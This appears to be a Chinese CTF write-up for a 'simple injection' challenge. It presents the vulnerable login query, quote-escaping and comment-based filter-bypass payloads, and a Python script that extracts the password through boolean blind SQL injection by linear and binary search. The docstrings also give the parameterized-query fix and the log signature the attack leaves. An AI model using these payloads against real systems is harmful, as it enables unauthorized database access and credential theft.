简单注入
hint.txt拿到数据库查询代码:
select * from users where username='$_POST["username"]' and password='$_POST["password"]';
这个就比较好分析了：提交 username 参数时，用反斜杠转义掉单引号，再用注释符绕过空格过滤:
username=admin\&password=/**/or/**/1>0#
username=admin\&password=/**/or/**/1<0#
执行这两个请求可以得到不一样的回显，很容易想到可以用盲注。
import requests
# Endpoint the probes below are POSTed to (see requests.post in submit1/submit2).
# This is the page's own CTF instance address, not a general target.
url = "http://0dafba8b-3cf1-4b74-9b9a-9195b5f5e6b0.node3.buuoj.cn/index.php"
def submit1():
    """Recover the password column one character at a time by linear scan.

    Background (from the page): the server builds its SQL by string
    concatenation of the POST fields, so the ``admin\\`` username swallows
    the closing quote and the ``password`` field lands inside the query.
    The fix on the server side is a parameterized/prepared statement; no
    amount of space or quote filtering closes this hole.

    How the loop reads: for position ``i`` it asks "is ascii(char) < j?" for
    j = 32..127 and treats the string ``"stronger"`` in the response body as
    the true branch of the injected ``if`` (both functions on this page rely
    on that same oracle). The first ``j`` that returns true means the
    character is ``j - 1``.

    Returns:
        The characters recovered so far, as a ``str``. The function returns
        when a whole 32..127 sweep finds no true response (``j == 127``),
        which is taken to mean the end of the value.

    Detection note: every probe is one HTTP POST, so a run of this script
    shows up in access logs as a burst of requests to index.php whose
    ``password`` field contains ``/**/`` and ``if(ascii(substr(`` — an easy
    signature for a WAF rule or a log alert.
    """
    data = {"username": "admin\\", "password": ""}
    result = ""
    i = 0
    while True:
        i = i + 1
        for j in range(32, 128):
            # Boolean probe for position i: true iff ascii(char_i) < j.
            payload = "or/**/if(ascii(substr(password,%d,1))<%d,1,0)#" % (i, j)
            data['password'] = payload
            response = requests.post(url=url, data=data)
            if "stronger" in response.text:
                # First true answer: the character is one below j.
                result += chr(j - 1)
                print(payload)
                print(result)
                break
            else:
                # No j in 32..127 satisfied the probe: assume end of value.
                if j == 127:
                    return result
def submit2():
    """Recover the password column one character at a time by binary search.

    Same oracle as ``submit1`` (``"stronger"`` in the response body marks
    the true branch of the injected ``if``), but each position is found by
    bisecting the 32..127 range on "ascii(char) > mid", so far fewer
    requests are sent per character. From a defender's view this is the
    same traffic pattern as ``submit1`` — repeated POSTs to index.php with
    SQL comment tokens in the ``password`` field — just shorter bursts.

    Returns:
        The recovered characters as a ``str``. The outer loop stops when a
        bisection ends with ``head == 32``, i.e. no character at that
        position compared greater than 32, which is taken as end of value.
    """
    data = {"username": "admin\\", "password": ""}
    result = ""
    i = 0
    while True:
        i = i + 1
        head = 32
        tail = 127
        while head < tail:
            mid = (head + tail) >> 1
            # Boolean probe for position i: true iff ascii(char_i) > mid.
            payload = "or/**/if(ascii(substr(password,%d,1))>%d,1,0)#" % (i, mid)
            data['password'] = payload
            response = requests.post(url=url, data=data)
            if "stronger" in response.text:
                head = mid + 1
            else:
                tail = mid
        if head != 32:
            result += chr(head)
        else:
            # Lower bound never moved: treat as end of the value.
            break
    print(result)
    return result
# Only the linear-scan variant is run here; submit2 (the binary-search
# variant against the same oracle) is defined above but never called.
if __name__ == "__main__":
    print(submit1())